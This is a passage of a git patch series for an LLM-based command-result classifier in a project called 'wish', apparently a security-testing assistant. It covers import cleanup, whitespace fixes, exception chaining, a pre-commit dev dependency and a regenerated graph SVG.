+2,7 @@ import os -from langchain_core.output_parsers import StrOutputParser, JsonOutputParser +from langchain_core.output_parsers import JsonOutputParser from langchain_core.prompts import PromptTemplate from langchain_openai import ChatOpenAI from wish_models.command_result.command_state import CommandState @@ -104,7 +104,7 @@ "reason": "Detailed explanation of why this state was chosen" }} -Where STATE_HERE is one of: SUCCESS_INITIAL_ACCESS, SUCCESS, COMMAND_NOT_FOUND, FILE_NOT_FOUND, +Where STATE_HERE is one of: 
SUCCESS_INITIAL_ACCESS, SUCCESS, COMMAND_NOT_FOUND, FILE_NOT_FOUND, REMOTE_OPERATION_FAILED, TIMEOUT, NETWORK_ERROR, or OTHERS. Example output: @@ -138,6 +138,7 @@ def classify_command_state(state: GraphState, settings_obj: Settings) -> GraphSt """ import json import logging + from wish_tools.tool_step_trace import main as step_trace # Create a new state object to avoid modifying the original @@ -170,8 +171,8 @@ def classify_command_state(state: GraphState, settings_obj: Settings) -> GraphSt # Initialize the OpenAI model model = ChatOpenAI( - model=settings_obj.OPENAI_MODEL, - api_key=settings_obj.OPENAI_API_KEY, + model=settings_obj.OPENAI_MODEL, + api_key=settings_obj.OPENAI_API_KEY, use_responses_api=True, model_kwargs={"response_format": {"type": "json_object"}} ) @@ -189,18 +190,18 @@ def classify_command_state(state: GraphState, settings_obj: Settings) -> GraphSt try: command_state_str = classification_data.get("command_state") reason = classification_data.get("reason", "No reason provided") - + # Log the classification result and reason logging.info(f"Command state classification: {command_state_str}") logging.info(f"Reason: {reason}") - + # Send to StepTrace if run_id is available if state.run_id: trace_message = json.dumps({ "command_state": command_state_str, "reason": reason }, ensure_ascii=False) - + try: step_trace( run_id=state.run_id, @@ -210,7 +211,7 @@ def classify_command_state(state: GraphState, settings_obj: Settings) -> GraphSt logging.info(f"StepTrace sent for run_id: {state.run_id}") except Exception as trace_error: logging.error(f"Error sending StepTrace: {str(trace_error)}") - + # Convert the classification string to CommandState if command_state_str == "SUCCESS_INITIAL_ACCESS": command_state = CommandState.SUCCESS_INITIAL_ACCESS @@ -230,11 +231,11 @@ def classify_command_state(state: GraphState, settings_obj: Settings) -> GraphSt command_state = CommandState.OTHERS else: raise ValueError(f"Unknown command state classification: 
{command_state_str}") - + except Exception as json_error: logging.error(f"Failed to process JSON response: {classification_data}") logging.error(f"Error: {str(json_error)}") - raise ValueError(f"Invalid JSON response from LLM: {str(json_error)}") + raise ValueError(f"Invalid JSON response from LLM: {str(json_error)}") from json_error # Set the command state and reason in the new state new_state.command_state = command_state diff --git a/wish-sh/uv.lock b/wish-sh/uv.lock index 3d31d94..d4a0831 100644 --- a/wish-sh/uv.lock +++ b/wish-sh/uv.lock @@ -1240,6 +1240,7 @@ requires-dist = [ dev = [ { name = "factory-boy", specifier = ">=3.3.1" }, { name = "graphviz", specifier = ">=0.20.1" }, + { name = "pre-commit", specifier = ">=3.6.0" }, { name = "pytest", specifier = ">=8.3.4" }, { name = "pytest-asyncio", specifier = ">=0.25.2" }, { name = "ruff", specifier = ">=0.9.8" }, From 41d75afb4b6d43b0e5e2071f0a41ded59ef0f61b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 29 May 2025 21:47:20 +0000 Subject: [PATCH 4/4] docs: update graph visualization --- wish-log-analysis-api/docs/graph.svg | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/wish-log-analysis-api/docs/graph.svg b/wish-log-analysis-api/docs/graph.svg index 5442acb..f173a31 100644 --- a/wish-log-analysis-api/docs/graph.svg +++ b/wish-log-analysis-api/docs/graph.svg @@ -22,7 +22,7 @@ command_state_classifier - + log_summarization->command_state_classifier @@ -34,13 +34,13 @@ result_combiner - + command_state_classifier->result_combiner - + __end__ __end__ @@ -52,13 +52,13 @@ - + __start__ __start__ - + __start__->log_summarization